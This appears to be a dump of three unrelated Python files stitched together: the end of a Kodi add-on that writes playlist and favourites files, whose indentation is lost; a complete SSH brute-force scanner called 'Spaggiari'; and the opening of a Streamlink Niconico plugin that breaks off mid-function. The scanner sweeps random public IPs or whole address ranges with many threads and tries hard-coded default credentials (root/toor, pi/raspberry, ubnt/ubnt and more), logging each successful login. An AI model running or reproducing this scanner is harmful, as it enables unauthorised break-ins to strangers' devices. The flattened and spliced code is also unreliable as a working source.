if "description" in response: descriptions[label] = f["description"]
else: descriptions[label] = ""
streams[d][label] = file
file_labels.append(label)
if f["filetype"] == "directory":
if "personal" in f["file"]: pass
else:
if f["file"] not in dirs_total:
dirs_total.append(f["file"])
label = re.sub(r'\[[^)].*?\]', '', f["label"])
dirs_labels.append(label)
if f["thumbnail"]: dirs_thumbs.append(f["thumbnail"])
else: dirs_thumbs.append("http%3a%2f%2fmirrors.kodi.tv%2faddons%2fhelix%2f{0}%2ficon.png".format(ADDON.getAddonInfo("id")))
if f["fanart"]: dirs_thumbs.append(f["fanart"])
else: dirs_thumbs.append("http%3a%2f%2fmirrors.kodi.tv%2faddons%2fhelix%2f{0}%2ffanart.jpg".format(ADDON.getAddonInfo("id")))
else: pass
if depth == maxdepth: break
id_folder = xbmc.translatePath("special://profile/addon_data/plugin.program.super.favourites/Super Favourites/{0}/".format(ADDON.getAddonInfo("id")))
name_folder = xbmc.translatePath("special://profile/addon_data/plugin.program.super.favourites/Super Favourites/{0}/".format(ADDON.getAddonInfo("name")))
if not xbmcvfs.exists(id_folder): xbmcvfs.mkdir(id_folder)
if not xbmcvfs.exists(name_folder): xbmcvfs.mkdir(name_folder)
#id_file = "%-36s (%s)%s" % (ADDON.getAddonInfo("id"), ADDON.getAddonInfo("name"), ".ini")
id_file = "%s (%s)%s" % (ADDON.getAddonInfo("id"), ADDON.getAddonInfo("name"), ".ini")
name_file = "%s (%s)%s" % (ADDON.getAddonInfo("name"), ADDON.getAddonInfo("id"), ".ini")
id_filename = os.path.join(id_folder, id_file)
name_filename = os.path.join(name_folder, name_file)
f = xbmcvfs.File(id_filename,"wb")
g = xbmcvfs.File(name_filename,"wb")
line = '%s' % addon_info_string
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
for d in sorted(streams):
num = dirs_total.index(d)
line = '\n\n_dirs["{0}"] = {1}\n'.format(dirs_labels[num] , d)
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
channels = streams[d]
for channel in sorted(channels):
url = channels[channel]
if not channel.endswith(".."): label = channel
elif channel.endswith(".."):
ows = channel.count('..')
prelabel = channel.rstrip("..")
fws = prelabel.count('..')
label = "{0} ({1})".format(prelabel, ows - fws)
line = '\n_streams["%s"] = %s' % (label.replace('"','\\\"'), url)
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
dirs_not_done = [x for x in dirs_total if x not in dirs_done]
if len(dirs_not_done) > 0:
f.write("\n\ndirs_not_done=")
g.write("\n\ndirs_not_done=")
line = str(dirs_not_done)
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
f.close()
g.close()
#id_file = "%-36s (%s)%s" % (ADDON.getAddonInfo("id"), ADDON.getAddonInfo("name"), ".m3u")
id_file = "%s (%s)%s" % (ADDON.getAddonInfo("id"), ADDON.getAddonInfo("name"), ".m3u")
name_file = "%s (%s)%s" % (ADDON.getAddonInfo("name"), ADDON.getAddonInfo("id"), ".m3u")
id_filename = os.path.join(id_folder, id_file)
name_filename = os.path.join(name_folder, name_file)
f = xbmcvfs.File(id_filename,"wb")
g = xbmcvfs.File(name_filename,"wb")
line = '#EXTM3U\n\n%s' % addon_info_string
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
if "plugin.audio" in ADDON.getAddonInfo("id"): radio = ' radio="true"'
else: radio = ''
for d in sorted(streams):
num = dirs_total.index(d)
channels = streams[d]
for channel in sorted(channels):
url = channels[channel]
try: thumb = thumbnails[channel]
except: thumb = "http%3a%2f%2fmirrors.kodi.tv%2faddons%2fhelix%2f{0}%2ficon.png".format(ADDON.getAddonInfo("id"))
if not channel.endswith(".."): label = channel
elif channel.endswith(".."):
ows = channel.count('..')
prelabel = channel.rstrip("..")
fws = prelabel.count('..')
label = "{0} ({1})".format(prelabel, ows - fws)
line = '\n#EXTINF:-1 tvg-id="{0}" tvg-name="{0}" tvg-logo="{1}" group-title="{2}"{3},{0}\n{4}'.format(label.replace(',',' -').replace('"','\''), thumb, ADDON.getAddonInfo("name").replace(',',' -'), radio, url)
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
f.close()
g.close()
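    # The #EXTINF lines written above follow the common IPTV M3U convention
    # (tvg-id / tvg-name / tvg-logo / group-title attributes, display name after
    # the comma, playable plugin URL on the following line); "radio=true" is set
    # for plugin.audio add-ons so clients list them under radio channels.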
file = "favourites.xml"
id_filename = os.path.join(id_folder, file)
name_filename = os.path.join(name_folder, file)
f = xbmcvfs.File(id_filename,"wb")
g = xbmcvfs.File(name_filename,"wb")
line = "<favourites>"
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
for d in sorted(streams):
num = dirs_total.index(d)
channels = streams[d]
for channel in sorted(channels):
url = channels[channel]
try: thumb = thumbnails[channel].rstrip("/")
except: thumb = "http://mirrors.kodi.tv/addons/helix/{0}/icon.png".format(ADDON.getAddonInfo("id")).rstrip("/")
if "image://" in thumb:
thumb = thumb.replace("image://","").replace("%3a",":").replace("%2f","/").replace("%5c","\\")
thumb = thumb.replace(ADDON.getAddonInfo("icon").replace("icon.png",""), "special://home/addons/{0}/".format(ADDON.getAddonInfo("id"))).replace("\\","/")
try: fanart = backgrounds[channel]
except: fanart = "http://mirrors.kodi.tv/addons/helix/{0}/fanart.jpg".format(ADDON.getAddonInfo("id"))
if "image://" in fanart:
fanart = fanart.replace("image://","").replace("%3a",":").replace("%2f","/").replace("%5c","\\")
fanart = fanart.replace(ADDON.getAddonInfo("icon").replace("icon.png",""), "special://home/addons/{0}/".format(ADDON.getAddonInfo("id"))).replace("\\","/")
try: description = descriptions[channel]
except: description = ""
if not channel.endswith(".."): label = channel
elif channel.endswith(".."):
ows = channel.count('..')
prelabel = channel.rstrip("..")
fws = prelabel.count('..')
label = "{0} ({1})".format(prelabel, ows - fws)
# prethumb = url.split("v_id=")[1]
            # line = '\n <favourite name="{0}" thumb="http://images-us-az.crackle.com/profiles/channels/{1}/OneSheetImage_800x1200.jpg">PlayMedia("{2}&sf_options=fanart%3D{3}&desc%3D{4}%26_options_sf")</favourite>'.format(label.replace("'","&apos;").replace('"',"&quot;"), url.split("v_id=")[1], url, fanart, description)
            line = '\n <favourite name="{0}" thumb="{1}">PlayMedia("{2}&sf_options=fanart%3D{3}&desc%3D{4}%26_options_sf")</favourite>'.format(label.replace("'","&apos;").replace('"',"&quot;"), thumb, url, fanart, description)
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
line = "\n</favourites>"
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
f.close()
g.close()
dialogs.notify(msg='Mapping Finished', title='%d total %d done' % (len(dirs_total), len(dirs_done)), delay=5000, image=get_icon_path("metalliq"))
@plugin.route('/testing')
def testing():
results = {}
for i in ["search", "searchalbum", "searchtrack", "searchmdvd", "discography", "discography-mb"]:
results[i] = audiodb.search(mode=i, artist=artist_name, album=album_name, track=track_name)
lib = plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode)
f = xbmcvfs.File("{0}artist.nfo".format(lib), 'w')
f.write(str(results))
f.close()
dialogs.notify(msg='Done', title='and Done', delay=5000, image=get_icon_path("metalliq"))
@plugin.route('/testingbakbak')
def testingbakbak():
library = {}
medias = ["movies", "tvshows", "musicvideos", "music", "live"]
for m in medias:
if m == "movies":
lib = plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode)
ite = RPC.videolibrary.get_movies(properties=["title","year","playcount","fanart","originaltitle","imdbnumber","thumbnail","file"])["movies"]
elif m == "tvshows":
lib = plugin.get_setting(SETTING_TV_LIBRARY_FOLDER, unicode)
ite = RPC.videolibrary.get_tvshows(properties=["title","year","playcount","fanart","originaltitle","imdbnumber","thumbnail","file"])["tvshows"]
# elif m == "musicvideos":
# lib = plugin.get_setting(SETTING_MUSIC_LIBRARY_FOLDER, unicode)
# ite = RPC.videolibrary.get_musicvideos(properties=["title","year","playcount","fanart","originaltitle","imdbnumber","thumbnail","file"])["musicvideos"]
else: continue
liq = xbmcvfs.listdir(lib)[0]
for i in ite:
try:
f = xbmcvfs.File(os.path.join(lib, i["imdbnumber"], "player.info"))
i["player"] = f.read()
f.close()
except: i["player"] = "na"
f = xbmcvfs.File("{0}library.nfo".format(lib), 'w')
f.write(str(ite))
f.close()
dialogs.notify(msg='Done', title='and Done', delay=5000, image=get_icon_path("metalliq"))
# movie_items = RPC.videolibrary.get_movies(properties=["title","genre","year","rating","playcount","fanart","director","trailer","tagline","plot","plotoutline","originaltitle","lastplayed","writer","studio","mpaa","cast","country","imdbnumber","set","showlink","streamdetails","top250","votes","thumbnail","file","resume","setid","tag","art","sorttitle","dateadded"])["movies"]
# tvshow_items = RPC.videolibrary.get_tvshows(properties=["title","genre","year","rating","playcount","fanart","director","plot","originaltitle","lastplayed","studio","mpaa","imdbnumber","premiered","season","episode","file","watchedepisodes","tag","art","sorttitle","episodeguide","dateadded"])["tvshows"]
# if m == "movies":
# lib_folder = plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode)
# movie_items = RPC.videolibrary.get_movies(properties=["title","genre","year","rating","playcount","fanart","director","trailer","tagline","plot","plotoutline","originaltitle","lastplayed","writer","studio","mpaa","country","imdbnumber","runtime","set","showlink","streamdetails","top250","votes","thumbnail","file","resume","setid","tag","sorttitle"])["movies"]
# if m == "tvshows":
# lib_folder = plugin.get_setting(SETTING_TV_LIBRARY_FOLDER, unicode)
# tvshow_items = RPC.videolibrary.get_tvshows(properties=["title","genre","year","rating","playcount","fanart","director","plot","originaltitle","lastplayed","studio","mpaa","imdbnumber","premiered","season","episode","file","watchedepisodes","tag","art","sorttitle","episodeguide","dateadded"])["tvshows"]
def testing2(type):
lib_folder = plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode)
lib_items = xbmcvfs.listdir(lib_folder)[0]
players_tot = [p.id for p in get_players("movies")]
players_act = [p.id for p in active_players("movies")]
players_dis = []
for i in players_tot:
if i not in players_act: players_dis.append(i)
players_lib = {}
for x in lib_items:
player_file = xbmcvfs.File(os.path.join(lib_folder, x, "player.info"))
content = player_file.read()
player_file.close()
players_lib[x] = content
plugin.log.info("lib_movies = {0}".format(lib_items))
plugin.log.info("tot_players = {0}".format(players_tot))
plugin.log.info("act_players = {0}".format(players_act))
plugin.log.info("dis_players = {0}".format(players_dis))
plugin.log.info("lib_players = {0}".format(players_lib))
tvshows_in_lib = RPC.videolibrary.get_tvshows(properties=["originaltitle", "imdbnumber", "year"])["tvshows"]
movies_in_lib = RPC.videolibrary.get_movies(properties=["originaltitle", "imdbnumber", "year"])["movies"]
plugin.log.info("tvshows_in_lib = {0}".format(tvshows_in_lib))
plugin.log.info("movies_in_lib = {0}".format(movies_in_lib))
sorted(["[B]{0}[/B]".format(p.clean_title) for p in players if p.id in plugin.get_setting(SETTING_MOVIES_ENABLED_PLAYERS, unicode)])
sorted(["[I]{0}[/I]".format(p.clean_title) for p in players if p.id not in plugin.get_setting(SETTING_MOVIES_ENABLED_PLAYERS, unicode)])
dialogs.notify(msg='Done', title='and Done', delay=5000, image=get_icon_path("metalliq"))
@plugin.route('/testingbak2')
def testingbak2():
library = {}
medias = ["movies", "tvshows", "musicvideos", "music", "live"]
lists = ["id", "imdb", "title", "otitle", "player"]
for m in medias:
library[m] = {}
if m == "movies":
lib_folder = plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode)
items = RPC.videolibrary.get_movies(properties=["originaltitle", "imdbnumber", "year"])["movies"]
elif m == "tvshows":
lib_folder = plugin.get_setting(SETTING_TV_LIBRARY_FOLDER, unicode)
items = RPC.videolibrary.get_tvshows(properties=["originaltitle", "imdbnumber", "year"])["tvshows"]
# elif m == "musicvideos":
# lib_folder = plugin.get_setting(SETTING_MUSICVIDEOS_LIBRARY_FOLDER, unicode)
# items = RPC.videolibrary.get_musicvideos(properties=["originaltitle", "imdbnumber", "year"])["musicvideos"]
# elif m == "music":
# lib_folder = plugin.get_setting(SETTING_MUSIC_LIBRARY_FOLDER, unicode)
# items = RPC.audiolibrary.get_artists(properties=["title","artist","albumartist","genre","year","rating","album","track","duration","comment","lyrics","musicbrainztrackid","musicbrainzartistid","musicbrainzalbumid","musicbrainzalbumartistid","playcount","fanart","director","trailer","tagline","plot","plotoutline","originaltitle","lastplayed","writer","studio","mpaa","cast","country","imdbnumber","premiered","productioncode","runtime","set","showlink","streamdetails","top250","votes","firstaired","season","episode","showtitle","thumbnail","file","resume","artistid","albumid","tvshowid","setid","watchedepisodes","disc","tag","art","genreid","displayartist","albumartistid","description","theme","mood","style","albumlabel","sorttitle","episodeguide","uniqueid","dateadded","size","lastmodified","mimetype"])["artists"]
else: continue
library[m]["metalliq"] = xbmcvfs.listdir(lib_folder)[0]
for l in lists: library[m][l] = []
for i in items:
if i["imdbnumber"] not in library[m]["metalliq"]: library[m]["player"].append("na")
else:
f = xbmcvfs.File(os.path.join(lib_folder, i["imdbnumber"], "player.info"))
library[m]["player"].append(f.read())
f.close()
if m == "movies": library[m]["id"].append(i["movieid"])
elif m == "tvshows": library[m]["id"].append(i["tvshowid"])
library[m]["imdb"].append(i["imdbnumber"])
library[m]["otitle"].append(i["originaltitle"].lower())
library[m]["title"].append(i["label"].lower())
plugin.log.info("movies_in_lib = {0}".format(library))
dialogs.notify(msg='Done', title='and Done', delay=5000, image=get_icon_path("metalliq"))
@plugin.route('/testingbak')
def testingbak():
movies_id_list = []
movies_imdb_list = []
movies_otitle_list = []
movies_title_list = []
movies_player_list = []
movies_metalliq_list = xbmcvfs.listdir(plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode))[0]
movies_in_lib = RPC.videolibrary.get_movies(properties=["originaltitle", "imdbnumber", "year"])["movies"]
for item in movies_in_lib:
if item["imdbnumber"] not in movies_metalliq_list: movies_player_list.append("na")
else:
            player_file = xbmcvfs.File(os.path.join(plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode), item["imdbnumber"], "player.info"))
content = player_file.read()
movies_player_list.append(content)
player_file.close()
movies_id_list.append(item["movieid"])
movies_id_list.append(item["movieid"])
movies_imdb_list.append(item["imdbnumber"])
movies_otitle_list.append(item["originaltitle"].lower())
movies_title_list.append(item["label"].lower())
tvshows_id_list = []
tvshows_imdb_list = []
tvshows_otitle_list = []
tvshows_title_list = []
tvshows_player_list = []
tvshows_metalliq_list = xbmcvfs.listdir(plugin.get_setting(SETTING_TV_LIBRARY_FOLDER, unicode))[0]
tvshows_in_lib = RPC.videolibrary.get_tvshows(properties=["originaltitle", "imdbnumber", "year"])["tvshows"]
for item in tvshows_in_lib:
if item["imdbnumber"] not in tvshows_metalliq_list: tvshows_player_list.append("na")
else:
            player_file = xbmcvfs.File(os.path.join(plugin.get_setting(SETTING_TV_LIBRARY_FOLDER, unicode), item["imdbnumber"], "player.info"))
            content = player_file.read()
            tvshows_player_list.append(content)
player_file.close()
tvshows_id_list.append(item["tvshowid"])
tvshows_imdb_list.append(item["imdbnumber"])
tvshows_otitle_list.append(item["originaltitle"].lower())
tvshows_title_list.append(item["label"].lower())
players_tot = [p.id for p in get_players("movies")]
players_act = [p.id for p in active_players("movies")]
players_dis = []
for i in players_tot:
if i not in players_act: players_dis.append(i)
    players_lib = {}
    lib_folder = plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode)
    lib_items = movies_metalliq_list
    for x in lib_items:
player_file = xbmcvfs.File(os.path.join(lib_folder, x, "player.info"))
content = player_file.read()
player_file.close()
players_lib[x] = content
plugin.log.info("lib_movies = {0}".format(lib_items))
plugin.log.info("tot_players = {0}".format(players_tot))
plugin.log.info("act_players = {0}".format(players_act))
plugin.log.info("dis_players = {0}".format(players_dis))
plugin.log.info("lib_players = {0}".format(players_lib))
plugin.log.info("tvshows_in_lib = {0}".format(tvshows_in_lib))
plugin.log.info("movies_in_lib = {0}".format(movies_in_lib))
sorted(["[B]{0}[/B]".format(p.clean_title) for p in players if p.id in plugin.get_setting(SETTING_MOVIES_ENABLED_PLAYERS, unicode)])
sorted(["[I]{0}[/I]".format(p.clean_title) for p in players if p.id not in plugin.get_setting(SETTING_MOVIES_ENABLED_PLAYERS, unicode)])
dialogs.notify(msg='Done', title='and Done', delay=5000, image=get_icon_path("metalliq"))
@plugin.route('/settings')
def settings_general():
openSettings(addonid, 0.0)
@plugin.route('/settings/movies')
def settings_movies():
openSettings(addonid, 1.2)
@plugin.route('/settings/tv')
def settings_tv():
openSettings(addonid, 2.2)
@plugin.route('/settings/music')
def settings_music():
openSettings(addonid, 3.3)
@plugin.route('/settings/live')
def settings_live():
openSettings(addonid, 4.2)
@plugin.route('/settings/advanced/')
def settings_advanced():
openSettings(addonid, 5.0)
@plugin.route('/settings/toggling/')
def settings_toggling():
openSettings(addonid, 5.3)
@plugin.route('/settings/appearance/')
def settings_appearance():
openSettings(addonid, 6.0)
@plugin.route('/.*extrafanart/')
def extra_fanart():
return
@plugin.route('/.*extrathumbs/')
def extra_thumbs():
return
@plugin.route('/.*nomedia')
def mo_media():
return
def openSettings(addonid, focus=None):
try:
xbmc.executebuiltin('Addon.OpenSettings(%s)' % addonid)
value1, value2 = str(focus).split('.')
xbmc.executebuiltin('SetFocus(%d)' % (int(value1) + 100))
xbmc.executebuiltin('SetFocus(%d)' % (int(value2) + 200))
except: return
def clickSettings(addonid, focus=None):
try:
xbmc.executebuiltin('Addon.OpenSettings(%s)' % addonid)
value1, value2 = str(focus).split('.')
xbmc.executebuiltin('SetFocus(%d)' % (int(value1) + 100))
xbmc.executebuiltin('SetFocus(%d)' % (int(value2) + 200))
xbmc.executebuiltin('SendClick(%d)' % (int(value2) + 200))
except: return
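# Note on the focus values above (assumed Kodi convention, not documented API
# behaviour): inside the settings dialog, category buttons get control ids
# 100+n and the controls within a category get 200+m, so e.g.
# openSettings(addonid, 1.2) jumps to category 1 and focuses its second setting.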
######### Main #########
def main():
if '/movies' in sys.argv[0]:
xbmcplugin.setContent(int(sys.argv[1]), 'movies')
elif '/tv/play' in sys.argv[0]:
xbmcplugin.setContent(int(sys.argv[1]), 'episodes')
elif '/tvdb' in sys.argv[0] and sys.argv[0].count('/') < 6:
xbmcplugin.setContent(int(sys.argv[1]), 'seasons')
elif '/tvdb' in sys.argv[0] and sys.argv[0].count('/') > 5:
xbmcplugin.setContent(int(sys.argv[1]), 'episodes')
elif '/tv' in sys.argv[0] and not '/settings' in sys.argv[0]:
xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')
elif '/music' in sys.argv[0]:
xbmcplugin.setContent(int(sys.argv[1]), 'musicvideos')
elif '/live' in sys.argv[0]:
xbmcplugin.setContent(int(sys.argv[1]), 'LiveTV')
elif '/list' in sys.argv[0]:
xbmcplugin.setContent(int(sys.argv[1]), 'videos')
plugin.run()
if __name__ == '__main__':
main()
|
spaggiari.py
|
#!/usr/bin/env python
# Spaggiari Scanner - Developed by acidvegas in Python (https://acid.vegas/spaggiari)
import argparse
import logging
import os
import random
import re
import socket
import sys
import threading
import time
from collections import OrderedDict
# Throttle Settings
max_threads = 100
throttle = 20
timeout_breaker = 5
timeout_port = 10
timeout_ssh = 10
# SSH Login Combos
combos = OrderedDict([
('root', ('root','toor','admin','changeme','pass','password','1234','12345','123456')),
('admin', ('1234','12345','123456','4321','9999','abc123','admin','changeme','admin123','password'))
])
deep_combos = OrderedDict([
('root', ('alien','alpine','calvin','kn1TG7psLu','logapp','openelec','pixmet2003','raspberrypi','rasplex','rootme','soho','TANDBERG','trendimsa1.0')),
('admin', ('aerohive','kn1TG7psLu','TANDBERG')),
('alien', 'alien'),
('bitnami', 'bitnami'),
('cisco', 'cisco'),
('device', 'apc'),
('dpn', 'changeme'),
('HPSupport', 'badg3r5'),
('lp', 'lp'),
('master', 'themaster01'),
('osmc', 'osmc'),
('pi', 'raspberry'),
('plexuser', 'rasplex'),
('sysadmin', 'PASS'),
('toor', 'logapp'),
('ubnt', 'ubnt'),
('user', ('acme','live')),
('vagrant', 'vagrant'),
('virl', 'VIRL'),
('vyos', 'vyos')
])
# Excluded IP Ranges
reserved = ('0','10','100.64','100.65','100.66','100.67','100.68','100.69','100.70','100.71','100.72','100.73','100.74','100.75','100.76','100.77','100.78','100.79','100.80','100.81','100.82','100.83','100.84','100.85','100.86','100.87','100.88','100.89','100.90','100.91','100.92','100.93','100.94','100.95','100.96','100.97','100.98','100.99','100.100','100.101','100.102','100.103','100.104','100.105','100.106','100.107','100.108','100.109','100.110','100.111','100.112','100.113','100.114','100.115','100.116','100.117','100.118','100.119','100.120','100.121','100.122','100.123','100.124','100.125','100.126','100.127','127','169.254','172.16','172.17','172.18','172.19','172.20','172.21','172.22','172.23','172.24','172.25','172.26','172.27','172.28','172.29','172.30','172.31','172.32','192.0.0','192.0.2','192.88.99','192.168','198.18','198.19','198.51.100','203.0.113','224','225','226','227','228','229','230','231','232','233','234','235','236','237','238','239','240','241','242','243','244','245','246','247','248','249','250','251','252','253','254','255')
def check_ip(ip):
return re.match('^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$', ip)
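# Illustrative sanity check for check_ip(): each octet must be 0-255, so
# check_ip('192.168.1.1') matches while check_ip('999.1.1.1') returns None.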
def check_port(ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout_port)
try:
code = sock.connect((ip, port))
except socket.error:
return False
else:
if not code:
return True
else:
return False
finally:
sock.close()
def check_range(targets):
found = False
for ip in targets:
if found:
break
for bad_range in reserved:
if ip.startswith(bad_range + '.'):
found = True
break
return found
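# Illustrative usage of check_range(): it prefix-matches against the reserved
# ranges above, so check_range(('10.1.2.3',)) is True (private space) while
# check_range(('8.8.8.8',)) is False and the target would be scanned.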
def ip_range(start_ip, end_ip):
start = list(map(int, start_ip.split('.')))
end = list(map(int, end_ip.split('.')))
temp = start
ip_range = []
ip_range.append(start_ip)
while temp != end:
start[3] += 1
for i in (3, 2, 1):
if temp[i] == 256:
temp[i] = 0
temp[i-1] += 1
ip_range.append('.'.join(map(str, temp)))
random.shuffle(ip_range)
return ip_range
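# Illustrative usage of ip_range(): ip_range('1.2.3.0', '1.2.3.255') yields all
# 256 addresses of the /24, shuffled so the sweep does not hit hosts in order.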
def random_int(min, max):
return random.randint(min, max)
def random_ip():
return '{0}.{1}.{2}.{3}'.format(random_int(1,223), random_int(0,255), random_int(0,255), random_int(0,255))
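# The first octet above is drawn from 1-223 so class D/E (multicast/experimental)
# space is never generated; reserved prefixes are still filtered separately by check_range().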
def random_scan():
while True:
ip = (random_ip(),)
if not check_range(ip):
threading.Thread(target=ssh_bruteforce, args=(ip[0],)).start()
while threading.activeCount() >= max_threads:
time.sleep(1)
def range_scan(ip_range):
for ip in ip_range:
threading.Thread(target=ssh_bruteforce, args=(ip,)).start()
while threading.activeCount() >= max_threads:
time.sleep(1)
while threading.activeCount() >= 2:
time.sleep(1)
def ssh_bruteforce(ip):
timeouts = 0
if check_port(ip, 22):
logging.debug('{0} has port 22 open.'.format(ip))
for username in combos:
            passwords = combos[username]
            if isinstance(passwords, str):
                passwords = (passwords,) # a bare-string entry would otherwise be iterated character by character
            for password in passwords:
if timeouts >= timeout_breaker:
break
else:
result = ssh_connect(ip, username, password)
if result == 1:
timeouts += 1
elif result == 2:
timeouts = timeout_breaker
time.sleep(throttle)
else:
logging.error('{0} does not have port 22 open.'.format(ip))
def ssh_connect(hostname, username, password):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname, 22, username, password, timeout=timeout_ssh)
except socket.timeout:
logging.error('Failed to connect to {0} using {1}:{2} (Timeout)'.format(hostname, username, password))
return 1
except Exception as ex:
logging.error('Failed to connect to {0} using {1}:{2} ({3})'.format(hostname, username, password, str(ex)))
return 0
else:
logging.info('Successful connection to {0} using {1}:{2}'.format(hostname, username, password))
return 2
finally:
ssh.close()
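# Return codes of ssh_connect(), as consumed by ssh_bruteforce() above:
# 1 = timeout (counted toward timeout_breaker), 0 = refused/auth failure, 2 = successful login.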
# Main
print(''.rjust(56, '#'))
print('#{0}#'.format(''.center(54)))
print('#{0}#'.format('Spaggiari Scanner'.center(54)))
print('#{0}#'.format('Developed by acidvegas in Python'.center(54)))
print('#{0}#'.format('https://git.supernets.org/acidvegas/spaggiari'.center(54)))
print('#{0}#'.format(''.center(54)))
logger = logging.getLogger()
logger.setLevel(logging.INFO)
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s | %(levelname)8s: %(message)s', '%I:%M:%S')
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
if not sys.version_info.major == 3:
logging.critical('Spaggiari Scanner requires Python version 3 to run!')
sys.exit()
try:
import paramiko
except ImportError:
logging.critical('Failed to import the Paramiko library!')
sys.exit()
else:
paramiko.util.log_to_file(os.devnull)
parser = argparse.ArgumentParser(prog='spaggiari.py', usage='%(prog)s [OPTIONS] [SCAN]')
parser.add_argument('-d', action='store_true', dest='deepscan', help='option: enable deep scanning.')
parser.add_argument('-f', action='store_true', dest='fastscan', help='option: enable fast scanning.')
parser.add_argument('-o', dest='output', help='option: save output from scan(s) to file.', metavar='<path>', type=str)
parser.add_argument('-l', dest='listscan', help='scan a list of ip addresses from file.', metavar='<path>', type=str)
parser.add_argument('-x', action='store_true', dest='randscan', help='scan random ip addresses. (does not stop)')
parser.add_argument('-r', dest='rangescan', help='scan a range of ip addresses.', metavar=('<class>', '<range>'), nargs=2, type=str)
parser.add_argument('-t', dest='targetscan', help='scan a target ip address.', metavar='<ip>', type=str)
args = parser.parse_args()
if args.deepscan:
if not args.targetscan:
logging.critical('Deep scanning can only be enabled with a target scan. (-t)')
sys.exit()
elif args.fastscan:
logging.critical('Fast scanning can not be enabled with a deep scan. (-f)')
sys.exit()
else:
        combos.update(deep_combos) # OrderedDict does not support '+'; deep-scan entries replace overlapping users
elif args.fastscan:
    if args.targetscan:
        logging.critical('Fast scanning can not be enabled with a target scan.')
        sys.exit()
    combos = {'root':('root',) }
if args.output:
file_handler = logging.FileHandler(args.output)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
logger.debug('Logging enabled.')
if args.listscan:
if os.path.isfile(args.listscan):
targets = []
with open(args.listscan) as list_file:
lines = list_file.read().splitlines()
for line in [x for x in lines if x]:
if check_ip(line):
targets.append(line)
if targets:
if not check_range(targets):
logging.debug('Scanning {0:,} IP addresses from list...'.format(len(targets)))
range_scan(targets)
logging.debug('Scan has completed.')
else:
logging.error('Reserved IP address in range.')
else:
logging.error('List contains no valid IP addresses.')
else:
logging.error('Invalid list file. ({0})'.format(args.listscan))
elif args.randscan:
logging.debug('Scanning random IP addresses...')
random_scan()
elif args.rangescan:
if args.rangescan[0] in ('b','c'):
if args.rangescan[0] == 'b':
            if args.rangescan[1] == 'random':
range_prefix = '{0}.{1}'.format(random_int(0,255), random_int(0,255))
else:
range_prefix = args.rangescan[1]
start = range_prefix + '.0.0'
end = range_prefix + '.255.255'
elif args.rangescan[0] == 'c':
            if args.rangescan[1] == 'random':
range_prefix = '{0}.{1}.{2}'.format(random_int(0,255), random_int(0,255), random_int(0,255))
else:
range_prefix = args.rangescan[1]
start = range_prefix + '.0'
end = range_prefix + '.255'
if check_ip(start):
targets = ip_range(start, end)
if not check_range(targets):
logging.debug('Scanning {0} IP addresses in range...'.format(len(targets)))
range_scan(targets)
logging.debug('Scan has completed.')
else:
logging.error('Reserved IP address in range.')
else:
logging.error('Invalid IP range prefix. ({0})'.format(args.rangescan[1]))
else:
logging.error('Invalid IP Class. ({0})'.format(args.rangescan[0]))
elif args.targetscan:
if check_ip(args.targetscan):
ssh_bruteforce(args.targetscan)
logging.debug('Scan has completed.')
else:
logging.error('Invalid IP Address. ({0})'.format(args.targetscan))
else:
parser.print_help()
|
nicolive.py
|
import json
import logging
import re
import threading
import time
from urllib.parse import unquote_plus, urlparse
import websocket
from streamlink import logger
from streamlink.plugin import Plugin, PluginArgument, PluginArguments, pluginmatcher
from streamlink.plugin.api import useragents
from streamlink.stream.hls import HLSStream
from streamlink.utils.times import hours_minutes_seconds
from streamlink.utils.url import update_qsd
_log = logging.getLogger(__name__)
_login_url = "https://account.nicovideo.jp/login/redirector"
_login_url_params = {
"show_button_twitter": 1,
"show_button_facebook": 1,
"next_url": "/"}
@pluginmatcher(re.compile(
r"https?://(?P<domain>live\d*\.nicovideo\.jp)/watch/(lv|co)\d*"
))
class NicoLive(Plugin):
arguments = PluginArguments(
PluginArgument(
"email",
argument_name="niconico-email",
sensitive=True,
metavar="EMAIL",
help="The email or phone number associated with your "
"Niconico account"),
PluginArgument(
"password",
argument_name="niconico-password",
sensitive=True,
metavar="PASSWORD",
help="The password of your Niconico account"),
PluginArgument(
"user-session",
argument_name="niconico-user-session",
sensitive=True,
metavar="VALUE",
help="Value of the user-session token \n(can be used in "
"case you do not want to put your password here)"),
PluginArgument(
"purge-credentials",
argument_name="niconico-purge-credentials",
action="store_true",
help="""
Purge cached Niconico credentials to initiate a new session
and reauthenticate.
"""),
PluginArgument(
"timeshift-offset",
type=hours_minutes_seconds,
argument_name="niconico-timeshift-offset",
metavar="[HH:]MM:SS",
default=None,
help="Amount of time to skip from the beginning of a stream. "
"Default is 00:00:00."))
is_stream_ready = False
is_stream_ended = False
watching_interval = 30
watching_interval_worker_thread = None
stream_reader = None
_ws = None
frontend_id = None
def _get_streams(self):
if self.options.get("purge_credentials"):
self.clear_cookies()
_log.info("All credentials were successfully removed")
self.url = self.url.split("?")[0]
self.session.http.headers.update({
"User-Agent": useragents.CHROME,
})
self.niconico_web_login()
if not self.get_wss_api_url():
